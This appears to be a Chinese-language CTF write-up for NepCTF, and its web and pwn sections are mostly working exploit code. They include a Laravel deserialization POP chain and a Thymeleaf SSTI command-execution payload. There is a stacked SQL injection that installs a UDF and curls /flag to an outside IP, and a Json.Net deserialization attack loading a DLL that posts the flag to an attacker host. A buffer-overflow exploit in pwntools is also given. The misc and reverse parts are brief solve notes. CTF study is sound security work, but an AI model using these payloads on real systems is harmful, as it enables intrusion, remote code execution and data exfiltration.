WEB

Just Kidding

Laravel 9.1.8 反序列化漏洞分析

namespace Faker {
    class Generator {
        protected $providers = [];
        protected $formatters = [];
        function __construct() {
            $this->formatter = "dispatch";
            $this->formatters = 9999;
        }
    }
}

namespace Illuminate\Broadcasting {
    class PendingBroadcast {
        public function __construct() {
            $this->event = "cat /flag";
            $this->events = new \Faker\Generator();
        }
    }
}

namespace Symfony\Component\Mime\Part {
    abstract class AbstractPart {
        private $headers = null;
    }

    class SMimePart extends AbstractPart {
        protected $_headers;
        public $h3rmesk1t;
        function __construct() {
            $this->_headers = ["dispatch"=>"system"];
            $this->h3rmesk1t = new \Illuminate\Broadcasting\PendingBroadcast();
        }
    }
}
namespace {
    $pop = new \Symfony\Component\Mime\Part\SMimePart();
    $ser = preg_replace("/([^\{]*\{)(.*)(s:49.*)(\})/","\\1\\3\\2\\4",serialize($pop));
    echo base64_encode(str_replace("i:9999","R:2",$ser));
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

FLAG：NepCTF{22841037-bea9-4a47-82d5-45b5cda15e3e}

Challenger

Thymeleaf的SSTI，找到原项目 spring-view-manipulation，再配一篇文章 Thymeleaf SSTI漏洞分析 - 先知社区 (aliyun.com)

payload

http://dea6b441-4446-47c1-8bf7-c1adbb760f61.nep.lemonprefect.cn:81/eval?lang=__$%7Bnew java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("cat /flag").getInputStream()).next()%7D__::.x
1

FLAG：NepCTF{ff3e4e7b-3da4-4249-bb72-0933393e5f90}

博学多闻的花花

注册任意用户后index.php存在堆叠注入，明明这里能直接利用，wp非得提一手二次注入…

看到能写so到plugin中，udf提权

payload：

POST:
q1=1&q2=2&q3=3&q4=4&q5=5');SELECT 0x7F454C46020... INTO DUMPFILE '/usr/lib64/mysql/plugin/udf.so';CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf.so';SELECT sys_eval('curl http://150.158.181.145:3000 -d @/flag');#
1
2

FLAG：NepCTF{CBF3BB22-D632-441D-A96D-405E0550A10F}

QR Code Maker

发现传的是json，反手加上数组尝试让他报错

{"content":[]}
1

提取到信息：

qrcode_maker.Pages.IndexModel.OnPost()
1

尝试加上type，瞎传数据去反序列化指定的类

{"$type":"qrcode_maker.Pages.IndexModel.OnPost()"}
1

又能提取一些信息，使用了 Newtonsoft.Json 即 Json.Net，

附件代码最后有一个任意类加载，还会创建实例。思路就是json.net去反序列化任意类

using System;
using System.Data;
using System.Reflection;

namespace qrcode_maker{
    
    [Serializable]
    public class Debug{
        private string _className = "";
        private string _methodName = "";
        public string ClassName{
            set{
                _className = value;
                Call();
            }
            get => _className;
        }

        public string MethodName{
            set{
                _methodName = value;
                Call();
            }
            get => _methodName;
        }
        public void Call(){
            if(ClassName != string.Empty && MethodName != string.Empty){
                if(ClassName.ToLower().Contains("system") || MethodName.ToLower().Contains("system")){
                    throw new DataException("你这数据(bao)有(shu)问(ma)题(?)啊！");
                }
                Assembly asm = Assembly.LoadFrom(_className);
                asm.CreateInstance(_methodName);
            }
        }
    }
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

关于json.net的利用方式 .NET高级代码审计Json.Net反序列化漏洞，dotnet 反序列化的另外几个gadget - Y4er的博客

但是System.Windows.Data.ObjectDataProvider 在 .NET Framework 才能成功利用。而 .NET Core 是没有的，这就要求我们去手动写入一个恶意类，没环境直接粘贴wp， .NET Core 将代码编译成库：

namespace rceTest3{
    public class Class1{
        public Class1(){
            string text = System.IO.File.ReadAllText(@"/flag");
            System.IO.File.WriteAllText("/app/wwwroot/js/flag.txt", text);
            // Done the work.
            new System.Net.Http.HttpClient().PostAsync("http://YOUR_HOST:3255", new System.Net.Http.StringContent(text));
        }
    }
}
1
2
3
4
5
6
7
8
9
10

指定反序列化

{"$type":"qrcode_maker.Debug, qrcode_maker","ClassName":"./uploads/f15662e7-a374-4802-b888-e08ab85cc2b3","MethodName":"rceTest3.Class1"}
1

exp.py

import base64
import re
import httpx

session = httpx.Client(base_url="http://5839072e-71a2-44c5-b484-8d2b8370bfb8.nep.lemonprefect.cn:81/")
response = session.post(url="/", json={
    "content": base64.b64encode(open("G:\\rceTest3.dll", "rb").read()).decode(), 
    "trash": "="
})
path = re.findall(r"Saved Original Content for debug: (.*?) ~", response.text)[0]
response = session.post(url="/", json={
    "$type": "qrcode_maker.Debug, qrcode_maker", 
    "ClassName": path, 
    "MethodName": "rceTest3.Class1"
})
print(response.text)
response = session.get(url="/js/flag.txt")
print(response.text)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

RE

快来签到

修改节点后

FLAG：NepCTF{welc0me_t0_nepctf}

MISC

9点直播

FLAG：NepCTF{bad_woman_nb!}

花花画画画花花

osu直接编辑。

FLAG：NepCTF{MASTER_OF_坏女人！}

馅饼？陷阱！

露出来一个琼，确定为海南省

银行与如家挨着

也不多就42个结果，先从三亚开始

百度街景，中国光大银行

FLAG：NepCTF{www.cebbank.com}

少见的bbbbase

stegdetect 发现为jphide，无密码导出

base58解密

FLAG：flag{Real_qiandao~}

问卷

FLAG：NepCTF{see_you_NepCTF_2023}

PWN

很好，堆全都不会。

全栈手

wget下载www.zip

存在后门点

源码都给了在business.c中 do_login 用于登录信息的处理在httpd.c中进行了调用，接受内容

username和password很明显的溢出，但是登陆的时候password会进行MD5，所以打username的溢出点就行了

exp：python2没环境…

from pwn import*
context.endian = 'little'
elf=ELF('./httpd')
r=remote("nep.lemonprefect.cn",33617)
post=''
post+="POST /login.action HTTP/1.1\n"
post+="Host: nep.lemonprefect.cn:33617\n"
post+="Content-Length: 1099\n"
post+="Accept: application/json, text/javascript, */*; q=0.01\n"
post+="X-Requested-With: XMLHttpRequest\n"
post+="User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36\n"
post+="Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n"
post+="Origin: http://nep.lemonprefect.cn:33617\n"
post+="Referer: http://nep.lemonprefect.cn:33617/login.html\n"
post+="Accept-Encoding: gzip, deflate\n"
post+="Accept-Language: zh-CN,zh;q=0.9\n"
post+="Connection: close\n\n"
post+="username="+"a"*0x418+p64(elf.sym['backups'])+"&password=356a192b7913b04c54574d18c28d46e6395428ab"
print(post)
r.sendline(post)
r.close()
os.system("curl http://nep.lemonprefect.cn:33617/flag.txt")
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22